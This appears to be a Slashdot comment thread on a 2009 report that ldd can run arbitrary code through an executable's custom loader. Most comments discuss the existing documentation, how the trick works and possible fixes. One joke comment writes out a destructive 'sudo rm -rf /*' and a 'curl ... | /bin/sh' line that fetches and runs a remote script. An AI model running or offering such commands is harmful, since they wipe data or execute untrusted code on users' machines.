<article>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#article09_10_26_1314209</id>
	<title>Arbitrary Code Execution With "ldd"</title>
	<author>kdawson</author>
	<datestamp>1256569980000</datestamp>
	<htmltext>pkrumins writes <i>"The <tt>ldd</tt> utility is more vulnerable than you think. It's frequently used by programmers and system administrators to determine the dynamic library dependencies of executables. Sounds pretty innocent, right? Wrong! It turns out that running <em>ldd</em> on an executable <a href="http://www.catonmat.net/blog/ldd-arbitrary-code-execution/">can result in executing arbitrary code</a>. This article details how such executable can be constructed and comes up with a social engineering scenario that may lead to system compromise. I researched this subject thoroughly and found that it's almost completely undocumented."</i></htmltext>
<tokenext>pkrumins writes " The ldd utility is more vulnerable than you think .
It 's frequently used by programmers and system administrators to determine the dynamic library dependencies of executables .
Sounds pretty innocent , right ?
Wrong ! It turns out that running ldd on an executable can result in executing arbitrary code .
This article details how such executable can be constructed and comes up with a social engineering scenario that may lead to system compromise .
I researched this subject thoroughly and found that it 's almost completely undocumented .
"</tokentext>
<sentencetext>pkrumins writes "The ldd utility is more vulnerable than you think.
It's frequently used by programmers and system administrators to determine the dynamic library dependencies of executables.
Sounds pretty innocent, right?
Wrong! It turns out that running ldd on an executable can result in executing arbitrary code.
This article details how such executable can be constructed and comes up with a social engineering scenario that may lead to system compromise.
I researched this subject thoroughly and found that it's almost completely undocumented.
"</sentencetext>
</article>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872963</id>
	<title>Thorough research</title>
	<author>Mortice</author>
	<datestamp>1256574720000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p><div class="quote"><p>'I researched this subject thoroughly and found that it's almost completely undocumented'.</p></div><p>Did the thorough research include a <a href="http://www.google.co.uk/search?q=ldd+security" title="google.co.uk">Google search for 'ldd security'</a> [google.co.uk]?</p><p>My thorough (3 minute research) turned up this tidbit from <a href="http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html" title="tldp.org">TLDP</a> [tldp.org]:</p><p><div class="quote"><p>Beware: do not run ldd on a program you don't trust. As is clearly stated in the ldd(1) manual, ldd works by (in certain cases) by setting a special environment variable (for ELF objects, LD\_TRACE\_LOADED\_OBJECTS) and then executing the program. It may be possible for an untrusted program to force the ldd user to run arbitrary code (instead of simply showing the ldd information). So, for safety's sake, don't use ldd on programs you don't trust to execute.</p></div></div>
	</htmltext>
<tokenext>'I researched this subject thoroughly and found that it 's almost completely undocumented'.Did the thorough research include a Google search for 'ldd security ' [ google.co.uk ] ? My thorough ( 3 minute research ) turned up this tidbit from TLDP [ tldp.org ] : Beware : do not run ldd on a program you do n't trust .
As is clearly stated in the ldd ( 1 ) manual , ldd works by ( in certain cases ) by setting a special environment variable ( for ELF objects , LD \ _TRACE \ _LOADED \ _OBJECTS ) and then executing the program .
It may be possible for an untrusted program to force the ldd user to run arbitrary code ( instead of simply showing the ldd information ) .
So , for safety 's sake , do n't use ldd on programs you do n't trust to execute .</tokentext>
<sentencetext>'I researched this subject thoroughly and found that it's almost completely undocumented'.Did the thorough research include a Google search for 'ldd security' [google.co.uk]?My thorough (3 minute research) turned up this tidbit from TLDP [tldp.org]:Beware: do not run ldd on a program you don't trust.
As is clearly stated in the ldd(1) manual, ldd works by (in certain cases) by setting a special environment variable (for ELF objects, LD\_TRACE\_LOADED\_OBJECTS) and then executing the program.
It may be possible for an untrusted program to force the ldd user to run arbitrary code (instead of simply showing the ldd information).
So, for safety's sake, don't use ldd on programs you don't trust to execute.
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873375</id>
	<title>Re:Specific to Linux?</title>
	<author>Anonymous</author>
	<datestamp>1256576400000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext><p>The author mentioned that on BSD the `ldd' app is a C app that does basically what the Linux shell script `ldd' does.  The Solaris `ldd' is also an app, so I can't verify that it's the same as on BSD, but setting LD\_TRACE\_LOADED\_OBJECTS=1 before running an application does cause ldd like output, so I would suspect the same rules apply under Solaris as described in the article.</p></htmltext>
<tokenext>The author mentioned that on BSD the ` ldd ' app is a C app that does basically what the Linux shell script ` ldd ' does .
The Solaris ` ldd ' is also an app , so I ca n't verify that it 's the same as on BSD , but setting LD \ _TRACE \ _LOADED \ _OBJECTS = 1 before running an application does cause ldd like output , so I would suspect the same rules apply under Solaris as described in the article .</tokentext>
<sentencetext>The author mentioned that on BSD the `ldd' app is a C app that does basically what the Linux shell script `ldd' does.
The Solaris `ldd' is also an app, so I can't verify that it's the same as on BSD, but setting LD\_TRACE\_LOADED\_OBJECTS=1 before running an application does cause ldd like output, so I would suspect the same rules apply under Solaris as described in the article.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873039</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875213</id>
	<title>Documented in ldd(1) and Program Library HOWTO</title>
	<author>dwheeler</author>
	<datestamp>1256585160000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>3</modscore>
	<htmltext>This is documented, and in multiple places.
My <a href="http://www.dwheeler.com/program-library/Program-Library-HOWTO/x36.html" title="dwheeler.com">Program Library HOWTO, section "Shared Libraries"</a> [dwheeler.com],
says the following, and it's dated in 2000:
"Beware: do not run ldd on a program you don't trust. As is clearly stated in the ldd(1) manual, ldd works by (in certain cases) by setting a special environment variable (for ELF objects, LD\_TRACE\_LOADED\_OBJECTS) and then executing the program. It may be possible for an untrusted program to force the ldd user to run arbitrary code (instead of simply showing the ldd information). So, for safety's sake, don't use ldd on programs you don't trust to execute."
Now I'd agree that it would better if ldd were changed to NOT do this.  If the result of this article is a change in its code to not do this, that would be a great result.  But it's simply not true that this is undocumented.</htmltext>
<tokenext>This is documented , and in multiple places .
My Program Library HOWTO , section " Shared Libraries " [ dwheeler.com ] , says the following , and it 's dated in 2000 : " Beware : do not run ldd on a program you do n't trust .
As is clearly stated in the ldd ( 1 ) manual , ldd works by ( in certain cases ) by setting a special environment variable ( for ELF objects , LD \ _TRACE \ _LOADED \ _OBJECTS ) and then executing the program .
It may be possible for an untrusted program to force the ldd user to run arbitrary code ( instead of simply showing the ldd information ) .
So , for safety 's sake , do n't use ldd on programs you do n't trust to execute .
" Now I 'd agree that it would better if ldd were changed to NOT do this .
If the result of this article is a change in its code to not do this , that would be a great result .
But it 's simply not true that this is undocumented .</tokentext>
<sentencetext>This is documented, and in multiple places.
My Program Library HOWTO, section "Shared Libraries" [dwheeler.com],
says the following, and it's dated in 2000:
"Beware: do not run ldd on a program you don't trust.
As is clearly stated in the ldd(1) manual, ldd works by (in certain cases) by setting a special environment variable (for ELF objects, LD\_TRACE\_LOADED\_OBJECTS) and then executing the program.
It may be possible for an untrusted program to force the ldd user to run arbitrary code (instead of simply showing the ldd information).
So, for safety's sake, don't use ldd on programs you don't trust to execute.
"
Now I'd agree that it would better if ldd were changed to NOT do this.
If the result of this article is a change in its code to not do this, that would be a great result.
But it's simply not true that this is undocumented.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872887</id>
	<title>the bug is not in ldd</title>
	<author>Anonymous</author>
	<datestamp>1256574240000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>3</modscore>
	<htmltext><p>If you had read the article closely you would understand that the bug is not in ldd, it is in the dynamic loader.</p></htmltext>
<tokenext>If you had read the article closely you would understand that the bug is not in ldd , it is in the dynamic loader .</tokentext>
<sentencetext>If you had read the article closely you would understand that the bug is not in ldd, it is in the dynamic loader.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872785</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29887067</id>
	<title>Re:Other dirty tricks</title>
	<author>Krunch</author>
	<datestamp>1256672640000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>&gt; A sufficiently clever binary can just map<br>&gt; ld.so and the app into itself and effectively<br>&gt; execute anyway.</p><p>That's ul\_exec(). Published in 2004.<br><a href="http://marc.info/?l=bugtraq&amp;m=107298764827122&amp;w=2" title="marc.info">http://marc.info/?l=bugtraq&amp;m=107298764827122&amp;w=2</a> [marc.info]</p></htmltext>
<tokenext>&gt; A sufficiently clever binary can just map &gt; ld.so and the app into itself and effectively &gt; execute anyway.That 's ul \ _exec ( ) .
Published in 2004.http : //marc.info/ ? l = bugtraq&amp;m = 107298764827122&amp;w = 2 [ marc.info ]</tokentext>
<sentencetext>&gt; A sufficiently clever binary can just map&gt; ld.so and the app into itself and effectively&gt; execute anyway.That's ul\_exec().
Published in 2004.http://marc.info/?l=bugtraq&amp;m=107298764827122&amp;w=2 [marc.info]</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873289</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874671</id>
	<title>Re:And the point is...</title>
	<author>Anonymous</author>
	<datestamp>1256582760000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>So, firstly, don't run ldd as root. (I use sudo, so no issues there.)</p></div><p>Heh, consider this:</p><p>Lets say you "sudo some\_stuff" then later (within the sudo timeout) you "ldd some\_evil\_binary".  So that evil binary just needs to run sudo and starts doing whatever it wants as root.</p><p>sudo does not protect you like you seem to think.  Besides, running an evil binary under you normal user account is not much better than a root compromise.  It could still install stuff to run as your user and that's probably where all you data is (plus it can make network connections and such).</p></div>
	</htmltext>
<tokenext>So , firstly , do n't run ldd as root .
( I use sudo , so no issues there .
) Heh , consider this : Lets say you " sudo some \ _stuff " then later ( within the sudo timeout ) you " ldd some \ _evil \ _binary " .
So that evil binary just needs to run sudo and starts doing whatever it wants as root.sudo does not protect you like you seem to think .
Besides , running an evil binary under you normal user account is not much better than a root compromise .
It could still install stuff to run as your user and that 's probably where all you data is ( plus it can make network connections and such ) .</tokentext>
<sentencetext>So, firstly, don't run ldd as root.
(I use sudo, so no issues there.
)Heh, consider this:Lets say you "sudo some\_stuff" then later (within the sudo timeout) you "ldd some\_evil\_binary".
So that evil binary just needs to run sudo and starts doing whatever it wants as root.sudo does not protect you like you seem to think.
Besides, running an evil binary under you normal user account is not much better than a root compromise.
It could still install stuff to run as your user and that's probably where all you data is (plus it can make network connections and such).
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872983</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874475</id>
	<title>OMG! VULNER4BILITY!</title>
	<author>jipn4</author>
	<datestamp>1256581740000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>But here are some even simpler social engineering ideas:</p><p>* tell people to replace<nobr> <wbr></nobr>/bin/sh with a binary you send them in the mail</p><p>* tell people to type sudo rm -rf<nobr> <wbr></nobr>/*</p><p>* tell people to type "curl <a href="http://yoursite.com/hack" title="yoursite.com">http://yoursite.com/hack</a> [yoursite.com] |<nobr> <wbr></nobr>/bin/sh"</p></htmltext>
<tokenext>But here are some even simpler social engineering ideas : * tell people to replace /bin/sh with a binary you send them in the mail * tell people to type sudo rm -rf / * * tell people to type " curl http : //yoursite.com/hack [ yoursite.com ] | /bin/sh "</tokentext>
<sentencetext>But here are some even simpler social engineering ideas:* tell people to replace /bin/sh with a binary you send them in the mail* tell people to type sudo rm -rf /** tell people to type "curl http://yoursite.com/hack [yoursite.com] | /bin/sh"</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873631</id>
	<title>Re:Specific to Linux?</title>
	<author>TorKlingberg</author>
	<datestamp>1256577840000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>As I understand it, it's not really a bug but a security issue that many are unaware of. It's similar to how many email worms send out<nobr> <wbr></nobr>.scr files (screensaver) because many people know not to run unknown<nobr> <wbr></nobr>.exe files.</p></htmltext>
<tokenext>As I understand it , it 's not really a bug but a security issue that many are unaware of .
It 's similar to how many email worms send out .scr files ( screensaver ) because many people know not to run unknown .exe files .</tokentext>
<sentencetext>As I understand it, it's not really a bug but a security issue that many are unaware of.
It's similar to how many email worms send out .scr files (screensaver) because many people know not to run unknown .exe files.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873039</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875235</id>
	<title>Re:1985 called, they want their exploit back</title>
	<author>Anonymous</author>
	<datestamp>1256585220000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>1986 called and they wanted their "1985 called" gag back.</p></htmltext>
<tokenext>1986 called and they wanted their " 1985 called " gag back .</tokentext>
<sentencetext>1986 called and they wanted their "1985 called" gag back.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873483</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872929</id>
	<title>Re:Another WIN in WINdows</title>
	<author>Anonymous</author>
	<datestamp>1256574480000</datestamp>
	<modclass>Redundant</modclass>
	<modscore>-1</modscore>
	<htmltext><p>http://www.dependencywalker.com/</p></htmltext>
<tokenext>http : //www.dependencywalker.com/</tokentext>
<sentencetext>http://www.dependencywalker.com/</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873463</id>
	<title>Risk assessment</title>
	<author>ikegami</author>
	<datestamp>1256576940000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Seems to me it would be easier to convince my sysadmin to simply run a program of my choice.

</p><p>This would be an interesting to include in a released program. The rate of infection will be low, but those infected are likely to be admins and power users. It would also provide some deniability. "I didn't change the loader! What does that even mean?"</p></htmltext>
<tokenext>Seems to me it would be easier to convince my sysadmin to simply run a program of my choice .
This would be an interesting to include in a released program .
The rate of infection will be low , but those infected are likely to be admins and power users .
It would also provide some deniability .
" I did n't change the loader !
What does that even mean ?
"</tokentext>
<sentencetext>Seems to me it would be easier to convince my sysadmin to simply run a program of my choice.
This would be an interesting to include in a released program.
The rate of infection will be low, but those infected are likely to be admins and power users.
It would also provide some deniability.
"I didn't change the loader!
What does that even mean?
"</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873471</id>
	<title>QD?</title>
	<author>Siberwulf</author>
	<datestamp>1256576940000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Uh, yeah.  Godmode ftw.  Who else didn't see this coming?</htmltext>
<tokenext>Uh , yeah .
Godmode ftw .
Who else did n't see this coming ?</tokentext>
<sentencetext>Uh, yeah.
Godmode ftw.
Who else didn't see this coming?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873023</id>
	<title>Re:Another WIN in WINdows</title>
	<author>Anonymous</author>
	<datestamp>1256575020000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext>Really?   Guess you've never used Depends or ILDASM or<nobr> <wbr></nobr>.NET Reflector or basically done any type of low level profiling on Windows.</htmltext>
<tokenext>Really ?
Guess you 've never used Depends or ILDASM or .NET Reflector or basically done any type of low level profiling on Windows .</tokentext>
<sentencetext>Really?
Guess you've never used Depends or ILDASM or .NET Reflector or basically done any type of low level profiling on Windows.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872791</id>
	<title>Quickly!</title>
	<author>Drunken Buddhist</author>
	<datestamp>1256573700000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext><p>Fetch me my tinfoil hat!</p></htmltext>
<tokenext>Fetch me my tinfoil hat !</tokentext>
<sentencetext>Fetch me my tinfoil hat!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895</id>
	<title>Another WIN in WINdows</title>
	<author>Anonymous</author>
	<datestamp>1256574300000</datestamp>
	<modclass>Funny</modclass>
	<modscore>5</modscore>
	<htmltext><p>In Windows, we avoid this vulnerability by giving you absolutely no fricking clue what dependencies exist for any given DLL. Suck that Unix fanboys!</p></htmltext>
<tokenext>In Windows , we avoid this vulnerability by giving you absolutely no fricking clue what dependencies exist for any given DLL .
Suck that Unix fanboys !</tokentext>
<sentencetext>In Windows, we avoid this vulnerability by giving you absolutely no fricking clue what dependencies exist for any given DLL.
Suck that Unix fanboys!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873039</id>
	<title>Specific to Linux?</title>
	<author>alcourt</author>
	<datestamp>1256575080000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>4</modscore>
	<htmltext><p>It'd be nice if the author made it more clear what OS this is claimed to apply to.  For example, Solaris 10 has<nobr> <wbr></nobr>/usr/bin/ldd as an ELF.  I don't have my HP-UX or AIX test systems handy, nevermind recent releases of RHEL.</p><p>Also, what efforts has the coder gone to in order to notify the appropriate security groups so that a fix can be produced quickly?  I'm not disputing the potential security issues, but there is a reason for first disclosing to a vendor on non-public channels.  Give the vendor/coder the chance to do the right thing and produce a fix.</p></htmltext>
<tokenext>It 'd be nice if the author made it more clear what OS this is claimed to apply to .
For example , Solaris 10 has /usr/bin/ldd as an ELF .
I do n't have my HP-UX or AIX test systems handy , nevermind recent releases of RHEL.Also , what efforts has the coder gone to in order to notify the appropriate security groups so that a fix can be produced quickly ?
I 'm not disputing the potential security issues , but there is a reason for first disclosing to a vendor on non-public channels .
Give the vendor/coder the chance to do the right thing and produce a fix .</tokentext>
<sentencetext>It'd be nice if the author made it more clear what OS this is claimed to apply to.
For example, Solaris 10 has /usr/bin/ldd as an ELF.
I don't have my HP-UX or AIX test systems handy, nevermind recent releases of RHEL.Also, what efforts has the coder gone to in order to notify the appropriate security groups so that a fix can be produced quickly?
I'm not disputing the potential security issues, but there is a reason for first disclosing to a vendor on non-public channels.
Give the vendor/coder the chance to do the right thing and produce a fix.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873117</id>
	<title>New Lingo</title>
	<author>Thunderstruck</author>
	<datestamp>1256575440000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>4</modscore>
	<htmltext><p><i> I researched this subject thoroughly and found that it's almost completely undocumented.' </i></p><p>Is this the new way to say "I checked it out and it's legit!"</p></htmltext>
<tokenext>I researched this subject thoroughly and found that it 's almost completely undocumented .
' Is this the new way to say " I checked it out and it 's legit !
"</tokentext>
<sentencetext> I researched this subject thoroughly and found that it's almost completely undocumented.
' Is this the new way to say "I checked it out and it's legit!
"</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873289</id>
	<title>Other dirty tricks</title>
	<author>Anonymous</author>
	<datestamp>1256576100000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>4</modscore>
	<htmltext><p>If an ELF binary doesn't have execute permissions and you can't just set them,<nobr> <wbr></nobr>/lib/ld*.so  will run it anyway.</p><p>Some security hacks work by making the exec syscall return an error. A sufficiently clever binary can just map ld.so and the app into itself and effectively execute anyway. Of course this won't honor setuid but it also won't remove capabilities that have been marked not permitted for the target binary.</p></htmltext>
<tokenext>If an ELF binary does n't have execute permissions and you ca n't just set them , /lib/ld * .so will run it anyway.Some security hacks work by making the exec syscall return an error .
A sufficiently clever binary can just map ld.so and the app into itself and effectively execute anyway .
Of course this wo n't honor setuid but it also wo n't remove capabilities that have been marked not permitted for the target binary .</tokentext>
<sentencetext>If an ELF binary doesn't have execute permissions and you can't just set them, /lib/ld*.so  will run it anyway.Some security hacks work by making the exec syscall return an error.
A sufficiently clever binary can just map ld.so and the app into itself and effectively execute anyway.
Of course this won't honor setuid but it also won't remove capabilities that have been marked not permitted for the target binary.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874519</id>
	<title>Re:Another WIN in WINdows</title>
	<author>Anonymous</author>
	<datestamp>1256581980000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>And it only works if no one calls LoadLibrary and links the libs for the dll's in.</p></htmltext>
<tokenext>And it only works if no one calls LoadLibrary and links the libs for the dll 's in .</tokentext>
<sentencetext>And it only works if no one calls LoadLibrary and links the libs for the dll's in.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872955</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29879273</id>
	<title>Not a bug</title>
	<author>BitZtream</author>
	<datestamp>1256562000000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Since when is the user executing arbitrary code a bug?</p><p>The attack vector requires that the user install and run something that is bad to start with.  If you can do that, you've already done what you need to do.</p><p>Yes, you can trick someone into running bad code with this, you could just as easy replace any code they are going to run or use LD\_PRELOAD.</p><p>To exploit this, you've already be compromised somehow.</p><p>The fix?  Signed binaries and only allowing trusted code to run on the system.</p><p>If you're worried about this, you really don't have a very good grasp on security of operating systems in general.</p></htmltext>
<tokenext>Since when is the user executing arbitrary code a bug ? The attack vector requires that the user install and run something that is bad to start with .
If you can do that , you 've already done what you need to do.Yes , you can trick someone into running bad code with this , you could just as easy replace any code they are going to run or use LD \ _PRELOAD.To exploit this , you 've already be compromised somehow.The fix ?
Signed binaries and only allowing trusted code to run on the system.If you 're worried about this , you really do n't have a very good grasp on security of operating systems in general .</tokentext>
<sentencetext>Since when is the user executing arbitrary code a bug?The attack vector requires that the user install and run something that is bad to start with.
If you can do that, you've already done what you need to do.Yes, you can trick someone into running bad code with this, you could just as easy replace any code they are going to run or use LD\_PRELOAD.To exploit this, you've already be compromised somehow.The fix?
Signed binaries and only allowing trusted code to run on the system.If you're worried about this, you really don't have a very good grasp on security of operating systems in general.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874927</id>
	<title>Re:Another WIN in WINdows</title>
	<author>SKJDot</author>
	<datestamp>1256583780000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext>dumpbin is available for windows. Part of the Visual Studio distribution.</htmltext>
<tokenext>dumpbin is available for windows .
Part of the Visual Studio distribution .</tokentext>
<sentencetext>dumpbin is available for windows.
Part of the Visual Studio distribution.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872947</id>
	<title>Re:Another WIN in WINdows</title>
	<author>Anonymous</author>
	<datestamp>1256574600000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>depends.exe.  Doesn't execute arbitrary code either.</p><p>ldd is a hack and always has been.  It's really just a special "run mode".</p></htmltext>
<tokenext>depends.exe .
Does n't execute arbitrary code either.ldd is a hack and always has been .
It 's really just a special " run mode " .</tokentext>
<sentencetext>depends.exe.
Doesn't execute arbitrary code either.ldd is a hack and always has been.
It's really just a special "run mode".</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876253</id>
	<title>RTFM!</title>
	<author>HomelessInLaJolla</author>
	<datestamp>1256590200000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>This OS has too many features.  How should anyone remember all of them?</p><p>The same is true of hardware.  The manpage is much more difficult to come by for audio, video, and network cards.</p></htmltext>
<tokenext>This OS has too many features .
How should anyone remember all of them ? The same is true of hardware .
The manpage is much more difficult to come by for audio , video , and network cards .</tokentext>
<sentencetext>This OS has too many features.
How should anyone remember all of them?The same is true of hardware.
The manpage is much more difficult to come by for audio, video, and network cards.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874481</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872913</id>
	<title>Re:ldd pwned</title>
	<author>Skapare</author>
	<datestamp>1256574420000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>4</modscore>
	<htmltext><p>It's the dynamic loader that knows how to interpret that executable format's list of libraries it depends on.  What "ldd" does is just trigger the dynamic loader to output the libraries instead of run the program.  The weakness is that an alternate dynamic loader might not do that and will just run the program anyway.  Possible fixes include a new "ldd" that parses the executable itself instead of trying to get the dynamic loader to do it, or a means to restrict what dynamic loaders can be used (to just the ones that play well with "ldd").</p></htmltext>
<tokenext>It 's the dynamic loader that knows how to interpret that executable format 's list of libraries it depends on .
What " ldd " does is just trigger the dynamic loader to output the libraries instead of run the program .
The weakness is that an alternate dynamic loader might not do that and will just run the program anyway .
Possible fixes include a new " ldd " that parses the executable itself instead of trying to get the dynamic loader to do it , or a means to restrict what dynamic loaders can be used ( to just the ones that play well with " ldd " ) .</tokentext>
<sentencetext>It's the dynamic loader that knows how to interpret that executable format's list of libraries it depends on.
What "ldd" does is just trigger the dynamic loader to output the libraries instead of run the program.
The weakness is that an alternate dynamic loader might not do that and will just run the program anyway.
Possible fixes include a new "ldd" that parses the executable itself instead of trying to get the dynamic loader to do it, or a means to restrict what dynamic loaders can be used (to just the ones that play well with "ldd").</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872785</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873149</id>
	<title>Re:the bug is not in ldd</title>
	<author>Timothy Brownawell</author>
	<datestamp>1256575560000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>3</modscore>
	<htmltext><p><div class="quote"><p>If you had read the article closely you would understand that the bug is not in ldd, it is in the dynamic loader.</p></div><p>The bug is that ldd executes the dynamic loader, which is specified by the executable being inspected. So if the executable claims to use ~/bin/evil.so as a loader instead of the standard<nobr> <wbr></nobr>/lib/ld-linux.so, then ldd will execute ~/bin/evil.so.</p></div>
	</htmltext>
<tokenext>If you had read the article closely you would understand that the bug is not in ldd , it is in the dynamic loader.The bug is that ldd executes the dynamic loader , which is specified by the executable being inspected .
So if the executable claims to use ~ /bin/evil.so as a loader instead of the standard /lib/ld-linux.so , then ldd will execute ~ /bin/evil.so .</tokentext>
<sentencetext>If you had read the article closely you would understand that the bug is not in ldd, it is in the dynamic loader.The bug is that ldd executes the dynamic loader, which is specified by the executable being inspected.
So if the executable claims to use ~/bin/evil.so as a loader instead of the standard /lib/ld-linux.so, then ldd will execute ~/bin/evil.so.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872887</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29889985</id>
	<title>Re:The bug is not in the dynamic loader</title>
	<author>ccady</author>
	<datestamp>1256640960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Could ldd run the untrusted loader in a sandbox?</htmltext>
<tokenext>Could ldd run the untrusted loader in a sandbox ?</tokentext>
<sentencetext>Could ldd run the untrusted loader in a sandbox?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873087</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29877115</id>
	<title>Re:The problem is the executable</title>
	<author>david\_thornley</author>
	<datestamp>1256550420000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext>There's different ways of getting compromised executables onto systems.  They're just files, after all, and lots of systems have ways of accepting arbitrary files (FTP servers, for example, often have anonymous dropboxes).  The trick is to get somebody to execute them, and most people running Linux systems are a bit smarter than that.  If the admins think a certain thing is harmless, and it isn't (in this case, ldd), it's an attack vector.</htmltext>
<tokenext>There 's different ways of getting compromised executables onto systems .
They 're just files , after all , and lots of systems have ways of accepting arbitrary files ( FTP servers , for example , often have anonymous dropboxes ) .
The trick is to get somebody to execute them , and most people running Linux systems are a bit smarter than that .
If the admins think a certain thing is harmless , and it is n't ( in this case , ldd ) , it 's an attack vector .</tokentext>
<sentencetext>There's different ways of getting compromised executables onto systems.
They're just files, after all, and lots of systems have ways of accepting arbitrary files (FTP servers, for example, often have anonymous dropboxes).
The trick is to get somebody to execute them, and most people running Linux systems are a bit smarter than that.
If the admins think a certain thing is harmless, and it isn't (in this case, ldd), it's an attack vector.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874419</parent>
</comment>
